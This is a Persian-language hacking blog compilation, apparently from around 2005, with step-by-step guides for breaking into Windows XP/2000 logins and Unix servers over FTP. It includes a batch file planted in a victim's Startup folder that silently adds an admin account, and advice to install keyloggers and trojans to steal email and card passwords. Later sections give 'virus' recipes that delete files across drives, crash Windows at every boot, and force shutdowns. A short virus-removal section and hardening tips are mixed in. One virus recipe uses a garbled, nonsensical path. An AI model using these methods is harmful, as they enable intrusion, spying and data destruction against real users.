در اين مقاله سعي دارم روش نفوذ به ويندوز XP , 2000 را شرح بدهم

 

 

 

براي اين کار چند روش وجود دارد کا روش اول هميشه کارساز نيست و فقط بر روي کامپيوتر هايي جواب ميدهد که از نظر پيکربندي امنيتي بسيار ضعيف هستند .

 

 

 

روش اول :

 

 

 

در جايي که از شما UserName , Password پرسيده مي شود کليد هاي Alt+Ctrl+Del را دو مرتبه همزمان فشار دهيد . در قسمت UserName کلمه Administrator را وارد کرده و جاي کلمه عبور را خالي بگذاريد و Enter بزنيد تا وارد ويندوز شويد ...

 

 

 

خوب اين روش ساده بود اما هميشه کارساز نيست اگر براي Administrator آن کلمه عبوري قرار داده شده باشد ؟!!

 

 

 

به سراغ روش دوم ميرويم :

 

 

 

روش دوم :

 

 

 

1- ابتدا يک فلاپي Bootable مي سازيم .

 

 

 

2- اغلب فايل سيستم ويندوز XP,2000 از نوع NTFS است و در محيط شبيه Dos که با فلاپي راه اندازي ميشود شناخته نمي شود بنا براين ما براي اين کار نياز به برنامه هايي مثل NTFS4DOS داريم.(اين نوع برنامه ها امکان کار کردن با درايو هايي که فايل سيستم آنها Ntfs را در dos به ما مي دهد.)

 

 

3- حالا که فلاپي آماده شد بايد با آن سيستم را راه اندازي کرد... اما اگر در Setup سيستم تنظيم شده باشد که با فلاپي راه اندازي نشود ...؟!!      آنگاه بايد به سراغ Setup رفت و در آن تنظيمات لازم را انجام دهيم اگر Setup با کلمه عبور محافظت شود آنگاه بايد به Bios نفوذ کنيم که در بخش نفوذ به Bios شرح داده شده است .

 

 

4- خوب پس از انجام مراحل فوق فلاپي را در فلاپي درايو قرار داده و سيستم را با آن راه اندازي مي کنيم . و بر نامه NTFS4DOS را اجرا مي کنيم تا به اطلاعات درايو هاي NTFS دسترسي داشته باشيم .

 

 

5- درايوي که ويندوز در آن نصب است را پيدا مي کنيم و به مسير زير رفته :

 

 

%Windir%\System32\Config\

 

 

Example : c:\windows\system32\config

 

 

در اين پوشه فايلي به نام * sam را در فلاپي کپي مي کنيم.

 

 

( نکته : در ويندوز 2000 با پاک کردن اين فايل ديگر کار تمام است و ميتوان با Username: Administrator و بدون پسورد وارد شويم اما ميتوان براي اين که رد پايي باقي نماند از فايل Sam يک کپي داشته باشيم تا بعد از انجام کارمان در ويندوز با برگرداندن اين فايل به جاي قبلي آن رد پاي خود را پاک کنيم و نام و پسورد کاربران به حالت قبل برگردد.)

 

 

از اين مرحله به بعد براي Windows Xp بيشتر توصيه ميشود :

 

 

6- بعد از کپي فايل با برنامه هايي نظير L0phtCrack ,John the Ripper آن را کرک مي کنيم تا پسورد را به دست آورد .

 

 

روش سوم :

 

 

در اين روش چهار مرحله اول روش دوم را انجام ميدهيم.

 

 

1- دستورات زير را در Notepad مي نويسيم و در فايلي با نام و پسوند test.bat ذخيره ميکنيم :

 

 

 

 

 

@echo off

 

 

 net user administrator 123 /add

 

 

 net localgroup administrator administrators /add

 

 

 net user administrator 123

 

 

 del test.bat

 

 

 @echo on

 

 

 

 

 

2- بعد فايل مورد نظر را در فلاپي کپي کرده و به سراغ کامپيوتر قرباني مي رويم و فايلي که در مرحله قبل ساخته ايم را در مسير زير کپي مي کنيم(به فرض که ويندوز در درايو C نصب باشد و کاربري با نام MOJTABA مدير سيستم باشد):

 

 

C:\Documents and Settings\MOJTABA\Start Menu\Programs\Startup

 

 

3- خوب حالا فقط کافي است که منتظر بمانيد تا کاربر MOJTABA يک بار وارد شود ديگر تمام است و شما بعد از آن مي توانيد با نام کاربري Administrator و کلمه عبور 123 وارد سيستم شويد.

 

 

توضيح دستورات مربوط به فايلي که ميسازيم :

 

 

در خط اول اين دستور باعث مخفي شدن بقيه دستورات در حال اجرا از ديد کاربر مي شود.

 

 

در خط دوم ما يک کاربر بانام Administrator و کلمه عبور 123 مي سازيم .(اين عمل براي اين صورت مي گيرد که ممکن است نام Administrator  را تغيير داده باشند).

 

 

در خط سوم کاربري را که در خط قبل ساخته ايم را به عنوان سرپرست (ادمين) سيستم قرار ميدهيم.

 

 

در خط چهارم احتمال مي دهيم که نام Administrator را تغيير داده نشده باشد . پس ما فقط پسورد آن را عوض مي کنيم.

 

 

در خط پنجم براي از بين بردن رد پا فايلي را که ساخته ايم را پاک مي کنيم.

 

 

در خط ششم هم حالتي را که دستور خط اول ايجاد کرده بود به حالت اول بر مي گردانيم.

 

 

 

 

 

نکته : توجه کنيد که به جاي کاربر Administrator و کلمه عبور 123 هر کاربر يا کلمه عبور ديگري مي توانيد قرار دهيد اما اين کاربر کمتر باعث شک مي شود .

 

 

روش چهارم :

 

 

استفاده از برنامه Windows XP / 2000 / NT Key  است . نسخه آزمايشي اين برنامه را مي توانيد از اينجا دريافت کنيد.

 

 

 

 

 

نتيجه :

 

 

حالا که به عنوان مدير وارد سيستم شديم چه کارهايي مي توانيم انجام دهيم .

 

 

اول اين که مي توانيد به اطلاعات سيستم دسترسي پيدا کرده و ...

 

 

دوم اين که توصيه مي شود يک برنامه جاسوسي مثل XpSpy ها ويا Key Logger ها نصب کنيد تا تمامي پسورد هاي ايميل ها و کارتهاي اعتباري و ... و وب سايت هاي که سر مي زند و حتي کلماتي که چت مي کند و ... را بدانيد ( در آينده نه چندان دور مقاله اي در مورد برنامه هاي جاسوسي خواهم نوشت ).

 

 

سوم اين که ميتوانيد يک تروجان روي کامپيوتر قرباني نصب کنيد و بقيه اش رو خودتون ميدونين ...

 

 

چهارم اين که مي توانيد کامپيوتر او را طوري پيکر بندي کنيد که به شما اجازه ريموت کردن را بدهد و با يک تروجان آي پي اون رو به دست آوريد و اون را کنترل کنيد .

 

 

پنجم ...

 

 

توصيه هاي مهم :

 

 

1- از دسترسي افراد نامطمئن به سيستم خود جلوگيري کنيد .

 

 

2- حداقل کاري که ميتونين انجام بدين اين است که سيستم شما با CDو يا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نماييد.

 

 

3- هميشه از کلمات عبور پيچيده که مخلوتي از حرف و عدد و علائم ويژه باشد استفاده کنيد . مثلا کلمه عبور X@#%Ubps خيلي بهتر از کلمه عبور spssstudioworks است . اين کار حداقل کرک کردن پسورد شما را طولاني ميکند.

 

 

4- LM Hash را غير فعال کنيد . براي اين منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنيد سپس پسورد ادمين را عوض کنيد.

 

 

5- نام کاربري Administrator وGuest را حتما تغيير دهيد و براي آنها کلمه عبور قرار دهيد .

 

 

6- اگر به کاربر Guest نيازي نداريد آن را غير فعال کنيد .

 

 

7- هر چند وقت يکبار پسورد خود را عوض کنيد.

 

 

8- کاربران خود را هر چند وقت يکبار چک کنيد تا از موارد مشکوک مطلع شويد.

 

عزیزان من امروز یک پست آموزشی برای شما گذاشتم ومیدانم که بیشتر شما با این مشکل روبرو شدید اگه شما از این پست پیروی کنید قول میدم که از این به بعد مطالب آموزشی بیشتری برای شما بنویسم

ویروس جدید برای کاربران یاهو و طریقه حذف آن

یکی از قوی ترین و شایع ترین ویروس / تروجان هایی که اخیرا در حال گسترش بین کاربران استفاده کننده از یاهو مسنجر می باشد ویروس " Exploit.JS.ADODB.Stream.e " است .

در صورتیکه کامپیوتر شما نیز به این ویروس آلوده شده باشد بدون آنکه متوجه شوید به لیست دوستانتان پیغامهایی مبنی بر بازدید از سایت nsl-school.org ارسال می شود . بدین ترتیب در صورت کلیک بر روی این لینکها دوستان شما نیز آلوده خواهند شد .

هنوز مشخص نیست سازنده این ویروس چه کسی است و این احتمال داده می شود که ویروس مذکور به سرقت اطلاعات و رمزهای شخصی افراد می پردازد . در صورتیکه شما و یا یکی از دوستانتان به این ویروس آلوده شده شده اید روش زیر مناسب ترین گزینه برای از بین بردن آن است :

پیام و لینک هایی که این ویروس ارسال می کند چیست ؟
در متن تمامی این پیغام ها لینکی به سایت Nsl-school.org داده شده است که در صورت کلیک کردن بر روی آن کامپیوتر شما آلوده می شود .

در صورتیکه به ویروس آلوده شوید چه مشکلاتی پیش خواهد آمد ؟
در ابتدا ویروس صفحه شخصی اینترنت اکسپلورر (Default IE Page) را به سایت nsl-school.org تغییر می دهد . در این صورت به هیچ طریق امکان عوض کردن آن وجود نخواهد داشت . بعد از هر باز باز کردن یک صفحه وب جدید ، ویروس مجددآ خود را در سیستم شما کپی می کند .

گزینه های Task Manager و Reg Edit در کامپیوتر غیر فعال می شوند تا شخص نتواند از این طریق فعالیت ویروس را مشاهده و یا از بین ببرد .

فایل هایی با نامهای svhost.exe , svhost32.exe , internat.exe در کامپیوتر ایجاد می شوند . ( برای اطمینان پوشه های windows و temp را بررسی کنید . )

ویروس بدون آنکه متوجه شوید پیغام هایی را به لیست دوستان شما ( Yahoo Messenger ID List ) ارسال می کند .

چگونه ویروس را از کامپیوتر خود پاک کنیم ؟

مرورگر اینترنت اکسپلورر را ببندید . از یاهو مسنجر خارج شوید . اتصال اینترنت را قطع کنید .

جهت فعال کردن Reg Edit دکمه های Start > Run را کلیک کنید و در کادر مربوطه عیناً عبارت زیر را وارد کنید و در نهایت کلید Enter را کلیک کنید .

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

جهت فعال کردن Task Manager دکمه های Start > Run را کلیک کنید و در کادر مربوطه عیناً عبارت زیر را وارد کنید و در نهایت کلید Enter را کلیک کنید .

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

اکنون نیاز به آن داریم که صفحه نخست مرورگر خود را به حالت قبل برگردانیم . دکمه های Start > Run را کلیک کنید و در کادر مربوطه عبارت Regedit را وارد کنید . و در نهایت کلید Enter را کلیک کنید . میسرهای زیر را با دقت پیدا نموده و در آنها وارد شوید . اکنون تمام لینک هایی را که به سایت ویروس یعنی (nsl-school.org) وجود دارند تغییر داده و بجای آنها سایت مورد نظر خود مثلاً گوگل ( google.com ) را وارد کنید .

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main

HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

HKEY_USERS\Default\Software\Microsoft\Internet Explorer\Main

اکنون نیاز به آن داریم که فعالیت ویروس را متوقف کنیم . دکمه های Ctrl + Alt + Del را فشار دهید . در لیست برنامه های فعال تمامی فایل های svhost32.exe را یافته و آنها را End Task نمایید .

از طریق جستجو و یا وارد شدن به پوشه های Windows و temp فایل های svhost32.exe و svhost.exe را یافته و حذف نمایید .

مجددآ به قسمت Start menu > Run > Regedit باز گردید . از طریق جستجو به دنبال عبارت svhost بگردید و تمام موارد یافت شده را حذف نمایید .

کامپیوتر خود را ریست نمایید . امیدواریم دیگر خبری از این ویروس نباشد .

هک کردن سرورها -==-هك كردن ISP به روش حرفه اي -==--==-قفل شدن ياهو آيدي

 

Sunday, June 19, 2005

 

 

 

 

 

سلام

 

سرور چيزي نيست جز يک کامپيوتر که تعدادي فايل و دايرکتوري روي ان ذخيره شده . سيستم عامل اين کامپيوتر به گونه ايست که علاوه بر دسترسي مستقيم به ان ( تا اينجا مثل هر کامپيوتري) اجازه ميدهد که افراد از کامپيوتر هاي ديگري که از طريق يک شبکه بدان کامپيوتر متصل اند به ان فايل ها دسترسي داشته باشند. اما براي دسترسي به اين فايل ها مقرراتي وجود دارد که همان admin معروف که سرپرستي اين شبکه را بر عهده دارد وضع ميکند. او دسترسي به بعضي فايل ها را محدود و به بعضي ديگر را مجاز ميسازد. يا براي دسترسي به فايل ها پس ورد هايي کي گذارد که تنها افراد خاصي بدان ها دسترسي داشته باشند.

تمام تلاش هکر دسترسي به اين فايل هاست که دسترسي بدين فايل ها بواسطه پس وردي محدود شده است.

پس تا اينجا واضح شد که هر کس براي دسترسي به اين فايل ها بايد حداقل با سيستم عامل ان سرور خاص اشنا باشد. و بعد نيز با شيوه دسترسي به اين فايل ها از راه دور (ftp).

حالا فرض کنيد که ان سيستم عامل يونيکس است و شما قصد داريد فايل اچ تي ام ال حاوي اطلاعات مربوط به صفحه اول سايتي دست يافته به جاي ان صفحهاي قرار دهيد که حاوي اسم شريفتان با ادرس ايميلتان است ( مثلا : "اين سايت توسط من "علي يوسفي" هک شد. اي ميل:XXXX@xxx.XXX") براي اين کار شما تلاش خواهيد کرد که مثل کامپيوتر خانه يتان وارد دايرکتوري مربوطه شده فايل x را انگولک کنيد.

ان اول ها انجام يک چنين کاري بسيار ساده بود اما هر چه مي گذرد دسترسي به اين فايل مشکل و مشکل تر ميشود ( البته هاست هاي ايران که هنوز عقب افتاده تر از اين حرفهايند)

مثال:

حالا فرض کنيد که اين سرور از ان نسبتا عقب مانده هاست و ما نيز قصد داريم به شيوه نسبتا بدوي و اما مهم از جنبه اموزشي ان فايل را انگولک کنيم.

ابتدا مواد مورد نياز:

دانستن دستورهاي ساده يونيکس :

HELP = HELP

COPY = CP

MOVE = MV

DIR = LS

DEL = RM

CD = CD

همين ها بس است.

داشتن برنامهاي مثل Cracker Jack و يا مشابه مه بعدا مي گوييم چه کار مي کند.

حالا بايد راهي پيدا کرد که بر ان پس ورد لعنتي فائق امد ( که البته همه کار همين است )

در سيستم هاي بونيکس تمام پس ورد هاي سيستم در داخل فايلي که در دايرکتوري به نام :

/etc است قرار دارند. پس فايل ما ادرسش مي شود : /etc/passwd . اگر فکر مي کنيد که با دسترسي به اين فايل همه پس وردها از انه شماست و کار انجام شده ، در اشتباهيد. زيرا تمام اطلاعاته موجود در اين فايل به صورتي يک طرفه "کد" شده اند و عملا "decode " کردن ان ممکن نيست. پس چه بايد کرد:

ان برنامه اي که ان بالا اسمش را بردم (Cracker Jack) برنامه ايست که ان فايل کد شده را برداشته و سعي مي کند با تطبيق دادن ان با کلماتي از پيش معين . پس ورد هاي موجود در ان فايل را پيدا کند .(مثل کاري که يک باستان شناس براي خواندن خط باستاني مي کند).

پس کل عمليات ساده شد به دستسي به فايل پسوردها و کشف رمزها بواسطه ان برنامه .

نکته اينجاست که ان ادمين کذايي قرار نيست که پس ورد ها را دودستي به شما تقديم کند. براي دسترسي به ان فايل پس ورد ها بايد از ftp استفاده کنيد

 

 

 

--------------------------------------------------------------------------------

 

 

اول بايد بدونيد كه سيستم سايت چيه و از چه نوع سروري استفاده ميكنه...سرورهاي ويندوز 2000 سرور ميتونم بگم غير قابل نفوذ هستش ولي سيستم هاي لينوكس و يونيكس با اين راه خيلي راحت باز ميشن....شما كافيه براي امتحان وارد داس بشين و بنويسيد ftp و بعد اينتر كنيد و حالا وارد سيستم ftp شده ايد و ميتوانيد از سرورهاي سايتهاي مختلف استفاده كنيد....

 

براي اين كار كلمه ي open را بنويسيد و اينتر كنيد و سپس آدرس سايت مورد نظر را كه همان سايت شركت اينترنت مورد نظر باشد را وارد كنيد و دكه ي اينتر را فشار دهيد و حالا اگر سيستم شركت مورد نظر شما لينوكس يا يونيكس باشد شما با 1 پيام كه از شما يوزر نيم را مي خواهد مواجه مي شويد كه من براي اينكه بهتر توضيح هاي من رو بفهمين 1 سايت رو در شيراز باز كردم يعني سيستم اصليش رو باز كردم و آماده ي هكران تازه كاري مانند شماست . براي امتحان اين مطالب بر روي آدرس www.greenchipco.com امتحان كنيد . يوزر را كلمه ي anonymous انتخاب كنيد و دكمه ي اينتر را بزنيد و حالا در خواست پسورد از شما مي شود . شما دكمه ي اينتر را بزنيد چون شما پسوردي نداريد و حالا شما وارد سيستم FTP شركت اينترنت تراشه ي سبز شده ايد كه از سيستم امنيتيه بسيار بسيار پاييني برخوردار مي باشد .

 

حالا براي اينكه بفهميد اين شركت اينترنت از چه سيستم هايي براي سرويس دهي به شما استفاده ميكنه كلمه ي dir را تايپ كرده و اينتر كنيد و مي بينيد كه در طرف راست ليست سيستم آملهاي 3 كامپيوتر موجود در سرور را به شما مي دهد كه 2 تاي آنها لينوكس و يكي از آنها 2000 سرور مي باشد....حالا شما بايد 1 ليست از امكاناتي كه داريد بگيريد چون حالا شما مانند 1 يوزر مجاز به شبكه نفوذ كرده و مي توانيد از سيستم اين شبكه استفاده كنيد ولي شما يك نفوذ كننده ي غير مجاز مي باشيد به همين دليل امكانات مورد دسترس شما نيز فرق دارند....حالا براي پيدا كردن شاه يوزر كه اين اسطلاح را براي فايلي به كار مي برند كه به نام passwd مي باشد و تمام يوزر نيم و پسوردهاي موجود در يك شبكه يا در كامپيوتر سرور در اين فايل مي باشد و شما اگر اين فايل را به دست آورديد بايد آن را با برنامه اي به نام crack jack ترجمه كنيد .

 

 

 

--------------------------------------------------------------------------------

آموزش ساخت ويروس هاي قوي و کشنده -------------------------------------------------------------------------------- به نام خدا آموزش ساخت ويروس هاي قوي و کشنده . 1=ويروس خطرناك cpu-567njkblaster بعد با پسوند bat. سيو كنيد. خطر: يك بار هم روي سيستم خودتون امتحان نكنيد. ويروس graphic card lower : توضيح در باره ويروس: اين ويروس فضاي كارت گرافيك رو پر ميكنه و ديگه هيچ بازي رو سيستم اجرا نميشه. نت پد رو باز كنيد و در آن تايپ كنيد : c/windows/system32/jefo/display/memory/full و براي save كردنش گزينه file رو زده و save as... رو انتخاب كنيد و اونو با اسم XXX.bat ذخيره كنيد اكنون ويروس شما آماده ميباشد ________________________________________ 2=ساخت ويروس فكر مي كنم همه شما ويروس Blaster رو بشناسيد (ويروسي كه باعث Shutdown شدن كامپيوتر تو 60 ثانيه مي شد و مي شه) و حتي خيلي از شما روش ساخت اون را بدونيد ولي لازم ميدونم نگاهي سريع به اون بندازم. اين ويروس رو به طريق مختلفي و با دستورات گوناگوني مي شه نوشت كه در اين جا دو روش رو مورد بررسي قرار ميديم اگر از اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد. روش اول با استفاده از Shortcut : در جايي از دسكتاپ خود کليک راست كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد: 1)shutdown -s -t xx 2)%windir%system32shutdown.exe -s -t xx توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است. روش دوم به كمك Notepad : نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيد. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد: shutdown -a و همه مراحل قبل را انجام دهيد.اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد. تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟ بله اين محيط متني به نسبت ناشناخته همان اديتور داس (Dos Editor) است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit. صبر كنيد. قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد (اينجا از كليدي به نام Undo خبري نيست.) همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد ________________________________________ شبه ويروس اگه ويندوز 98 داريد بريد تو Run و تايپ كنيد Con/Con : چيزى كه مشاهده خواهيد كرد همون صفحه آبى رنگ ويندوز! هيچ چاره اى جر restart كردن رو براتون باقى نمي گذاره.حالا چه جورى مي تونيم از اين باگ كه در ويندوز98 موجود است استفاده كنيم.يكى از راهاش اينه كه در يك صفحه اينترنت اين دستور را وارد كنيم كه اين فايل را از كامپيوتر فراخوانى كند بدين صورت file:///c:/con/con مي توانيد از اين باگ يه فايل درست كنيد كه وقتى كسى اين فايل رو اجرا كرد هر بار كه كامپيوترش اين فايل فراخوانى بشه و راهى بجز فرمت رو براش پيش رو نگذاره يه صفحه يtxt باز كنيد و اين دستورات رو توش بنويسيد و با پسوند .REG سيو كنيد Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] @="c:\\con\\con" اين باعث ميشه كه باهر بار ريستارت كردن كامپيوتر اين دستور اجرا بشه و نهايتا همون صفحه آبى رنگ بياد كه راهى جز restart كردن نداره.اگر ويندوز NT /200 / XP مي توانيد يه كار ديگه بكنيد يه صفحه يtxt ‌‌باز كنيد بعد اين كامند ها رو بتوش بنويسيد c: del autoexec.bat del config.sys cd winnt del system.ini del win.ini بعد فايل رو با پسوند .BAT سيو كنيد. اين فايل رو وقتى براى كسى بفرستيد هيچى نمي شه اما به محض اينكه كامپيوتر رو restart كنه ديگه بار بعدي بالا نمياد. ________________________________________ آموزش ويروس نويسي اين ويروس بسيار خطرناك است چون با اجرا شدن آن ديگر براي قرباني راهي جز اف ديسك كردن كامپيوتر باقي نمي ماند. مواظب باشيد اشتباها روي آن دابل كليك نكنيد. هرگونه استفاده غير متعارف از اين ويروس به عهده كاربر مي باشد. متن ويروس: ATTRIB -a -s -h -r c ATTRIB -a -s -h -r c:\windows\*.* Echo y | echo a | Echo y | del c:\*.* Echo y | echo a | Echo y | del d:\*.* Echo y | echo a | Echo y | del e:\*.* Echo y | echo a | Echo y | del f:\*.* Echo y | echo a | Echo y | del g:\*.* echo y | copy *.* C:\ echo y | copy *.* D:\ echo y | copy *.* E:\ echo y | copy *.* F:\ echo y | copy *.* G:\ لطفا نظر بدين .